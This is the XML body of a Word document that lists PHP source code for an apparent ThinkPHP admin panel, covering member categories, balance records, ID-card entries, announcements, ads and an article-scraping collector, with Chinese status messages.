      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;','2'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','3'=&gt;'&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08799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B2C6B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$db=Db::name('member')-&gt;where('id',$id)-&gt;setField('hide',$type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323516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9ACF7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$data=[$text[$type]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9463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6B63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删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57000A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7998C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8A3EC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$data=['GET</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B2B7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3819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3526D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提交错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEBBD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C33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8391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7AA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category(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FC10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$data=Db::name('member_category')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66038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$data=get_tree_option($data,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306489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1BF740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7726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10A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categoryAdd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FAC6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43913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$category=Db::name('member_category')-&gt;where('tid','0')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B53C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$this-&gt;assign('category',$category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E99E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877FF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3E9395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3ED62C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$titledb=Db::name('member_category')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39757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6B277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标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648F32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A2B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$db=Db::name('member_category')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51964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CFF23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3302DC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FC43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74DA3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379C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213B3F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$db=Db::name('member_category')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FA43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40ABC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1AF1F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119F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72177F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81E5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5E8B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A2B6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$typeid=input('typeid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA96B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4794F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9E7E9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$name=Db::name('member_category')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110414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64A3F7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015AF2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9094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$this-&gt;error('id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1320AC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93D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CCD3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02DA87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8393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6BD2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A81A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categoryDel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5919D7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F715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4A0153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FE2B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$db=Db::name('member_category')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278DC0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4298E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49506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D13D3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6C9D0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EEA42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BFA41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AB05E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25AC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F5FB1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151693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1F1C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A9898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B150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records(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307903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$money=input('money') ? input('money') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D911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 ? input('type') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3203A5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$data=input('data') ? input('data') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FC8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04011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381569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if($type=='-1'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288A8B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$where['money']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661241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57485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$where['type']=$type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423872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A9AA9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5716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$db=Db::name('member_records')-&gt;order('id desc,time desc')-&gt;where($where)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0AF3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$data=$db-&gt;toarray()['data'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013DA1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$type=['money'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','score'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>积分</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','jingyan'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>经验值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D28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5AC204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if($v['money']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60386B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$data[$k]['text']=$v['text'].' &lt;b id="data1"&gt;'.$v['data'].'&lt;/b&gt;&lt;b id="data2"&gt;'.$v['money'].'&lt;/b&gt; '.$type[$v['type']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F819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F13D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E40E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7D1758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$db-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B2F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042D17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 input('type'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EAA8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55C34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4A3D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recordsDel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341F5B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320A74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61C4E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16F92B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FFEE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$db=Db::name('member_records')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EE67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4FF73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06EBF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67B29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5DE77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3BA97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5777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E884B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C4F3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7AFB7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5B24D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687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245F2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0872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sfz(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B250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75CFA2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$search_name=input('param.name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AC1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$search_type=input('param.type');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BD0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 &amp;&amp; $search_type){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047D37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$map[$search_type]  = $search_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C689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58A85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4E202D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7A99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$data=Db::name('member_sfz')-&gt;order('id desc')-&gt;where($map)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516ABE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711E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560C8F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3AFC4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AC51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C3AF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sfz_add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2686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7D031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9AA5D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7C09E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if(!$post['uid']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5383F8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必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D02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536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7EE940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$post['time'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555353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$db=Db::name('member_sfz')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C3F8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115DD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0ED88B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46C78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70661F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8C936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7A3461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$db=Db::name('member_sfz')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46806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842B3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41F6D1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4D69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274BAB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D0199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5CC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05D5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85295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$name=Db::name('member_sfz')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7349D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2E017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19E499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1F19E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5D4BC5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DB3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159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62EEB2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4AE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609A1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8375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sfz_del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004CB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AA47A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30C3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7399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$db=Db::name('member_sfz')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FD8C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8010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5A7421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42A4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54D87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EA8F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2CF4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49237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5C29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2A81E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669688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0D1E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A490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DA3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sfz_hide(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424919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09677C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$hide=input('hide'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62293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17223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$db=DB::name('member_sfz')-&gt;where('id',$id)-&gt;setField('hide',$hide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C0D6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$this-&gt;redirect("sfz");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFC6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AE95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AE89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gonggao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD8B3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1D5F22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$search_name=input('param.name');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C28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$search_type=input('param.type');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722DE7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 &amp;&amp; $search_type){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661DAB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$map[$search_type]  = ['like','%'.$search_name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4509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8C21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14DF4C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95D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$data=Db::name('gonggao')-&gt;order('id </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>desc')-&gt;where($map)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700998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3B1F9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$data-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462513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176E09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3793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967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gonggao_add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FBEA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156EAF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25655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552BE4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$post['time'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD9B1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2D87CE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$db=Db::name('gonggao')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E037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5B37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00257E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98582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51E2E9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91F2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0AFF7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$db=Db::name('gonggao')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C14E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0EF80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3F0FF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1F95B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3646C0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4269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C79F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63193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6FA4A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$name=Db::name('gonggao')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B091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262037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3D0679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C5F58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0C91E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B3A9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698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150D18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6A7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A2A6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94E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gonggao_del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C52B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81F9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5F188E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4C18E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$db=Db::name('gonggao')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723EB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B8472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53276C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A6C43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1670BA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DA51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9DA4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4CE05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EC7F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8B88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1A33A0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98AF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17F0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B6E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2FD8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45C67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77EAA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7F8C92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EE85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Ad extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43196A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1057D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0AAFC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$data=Db::name('ad')-&gt;order('id desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1418EA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$this-&gt;assign('data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF77E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3CC0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AD86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4D044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7EC24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9482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5F6D87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07E385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3E9294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$titledb=Db::name('ad')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184B3A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1914A9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分组标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A60F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AF2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$db=Db::name('ad')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C78FC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87E77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06B5C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622EF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055619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31103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4EB1E7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$db=Db::name('ad')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1568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2497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1744F7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BC950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0513E3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FBF9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91C9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2F48A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A6EA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$name=Db::name('ad')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530862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03A6F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37A477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B8ACE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572148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DC2A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58D1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$data=$this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417139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C391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CA2FA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6B08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0C44B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35521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3E7FC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5D5F7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$db=Db::name('ad')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C88BE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512D2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3E1EE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9D4B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2767F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BAF2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ABA01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CDBFE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B13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F978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2A119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6E03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C7DC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3B9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appDel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5895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A6AD9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0032C3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3681DA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$db=Db::name('appad')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE8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77927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7DFE8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8693C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683263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02FFE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C5641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140FFC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61EB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B9A8C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72FFC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328A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FEB6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156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app(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00604F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$data=Db::name('appad')-&gt;order('id desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DFE1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6CDB9F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089C1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DC9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appAdd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0846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518DF5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E218E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785803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638A42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$db=Db::name('appad')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A327A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if($db){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA10E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76C7C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9D8FE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44B2B2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685C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2450A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$db=Db::name('appad')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45441B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0D19F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64CE81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148CB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40A86D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6E1E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929E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AC56F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435720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$name=Db::name('appad')-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008648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3A9588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15AE8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2768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7E1B2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8E72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CE5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531CF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EA74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789B6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FE8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function appconfig(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6815D1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28077E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$this-&gt;assign('cfg',$config['ad']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428326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C5E7C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FCCB7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3BA9C9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$data=$post;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA13F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740C0B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$data=var_export($data, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1C3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$data=str_replace("array", "return", $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6FAF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6DAE23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4C86E6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$data="&lt;?php\r\n".$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E33A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file_put_contents(APP_PATH.'extra/ad.php', print_r($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6250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2CB4A0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8745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保存失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121E7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B6BE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EC11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110A9A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E20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F69AA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3B4EC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E7C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C6DD3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C5FB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E9A76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6C57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60CC04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0DCBCD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5E913E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Collection extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050547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6985C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0E2BE7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$data=Db::name('collection_type')-&gt;order('id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455D15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$this-&gt;assign('data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2026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2F72F0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87B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typeadd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC3A6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7BCBD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7434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A720F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14B9CC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36EB3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$titledb=Db::name('collection_type')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795D9F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17BF1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分组标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199D1B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3A56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$db=Db::name('collection_type')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481219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96F83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4625B8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0129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54FE08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097BE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4867DB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$db=Db::name('collection_type')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53645E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C9AC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691609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D647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620939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F4B9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868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54AB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E99D4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$name=Db::name('collection_type')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E772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1D424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1314BC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DA05F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C80AE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A5D6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2D44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B9C0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C24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3E0E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1A64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typeDel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8067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if(request()-&gt;isAjax()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FC9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63660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B791B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$db=Db::name('collection_type')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501BC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5ED6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0F5776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970EA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6BEA6C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588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ED2E0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B002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B409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5DBED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14372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9899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0449B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0D5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rule(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F6C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6C214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E987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4AC00F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$type=$post['type'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453272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$html=file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B558E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C51B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$data=json_decode($html);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF0E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9363C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采集失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B928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525B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9240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$data=['err'=&gt;'type</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B1E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1D4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F78EE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D5C1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CDA4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92FB9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F4E7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ruledata(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5150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068C9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5AD2A1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5D910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if(!$post['mychannel']){return ['err'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请先点击你要采集目标分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210B02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if($post['urls']=='urls'){  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E755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$data=[url('collection/ruledata',['mychannel'=&gt;$post['mychannel']])];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362EB0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83E01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$data=['url'=&gt;url('collection')]; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC0B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F27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5103B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$data=['err'=&gt;'type</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC52D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5D2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2AC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$typeiddb=Db::name('typeid')-&gt;order('des desc,id asc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126405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$this-&gt;assign('typeid',get_tree_option($typeiddb,0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2239AF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A083D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31E7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A7C2D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E12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ruledataview(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE72E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2DF3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8AC44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53C50F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$html=file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DF0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preg_match("/&lt;article id=\"J_article\" class=\"J-article article\"&gt;([\s\S]*?)&lt;\/article&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A69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/",$html,$article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52308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$article=$article['1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F0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preg_match("/&lt;h1 class=\"title\"&gt;(.*?)&lt;\/h1&gt;/", $article, $title);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F32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preg_match('/&lt;span class="src"&gt;(.*?)&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来源：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(.*?)&lt;\/span&gt;/', $article, $text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFF8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preg_match('/&lt;div id="content" class="J-article-content article-content"&gt;([\s\S]*?)&lt;\/div&gt;/', $article, $content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754A4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$content=preg_replace("/&lt;(p.*?)&gt;/si","&lt;p&gt;",$content['1']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF137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$content=preg_replace("/&lt;(\/?figure.*?)&gt;/si","",$content); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FA01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$content=preg_replace("/&lt;(\/?a.*?)&gt;/si","",$content); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37229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$content=preg_replace("/(data.*?)\"(.*?)\"/si","",$content); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44281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$content=preg_replace("/(width.*?)\"(.*?)\"/si","",$content); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521697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$content=preg_replace("/(alt.*?)\"(.*?)\"/si","",$content); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C364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$content=preg_replace("/(style.*?)\"(.*?)\"/si","",$content); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF88B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preg_match_all("/src=\"(.*?)\"/",$content,$img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3313F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8ED5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4598F9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($img[1] as $k  =&gt;  $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A110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$img_1=$v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76023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$img_2=$this-&gt;upload($img_1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBDAC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if($img_1 &amp;&amp; $img_2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A0BE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$content=str_replace($img_1,$img_2,$content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B213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if($k==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A99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$image=$img_2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FAF2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424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4A11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85A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8553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$content=str_replace("\r\n","",$content);   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ECA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if($title['1'] &amp;&amp; $content){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E6B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$titledb=Db::name('article')-&gt;where('title',$title['1'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72078A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264B7C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['err'=&gt;'&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
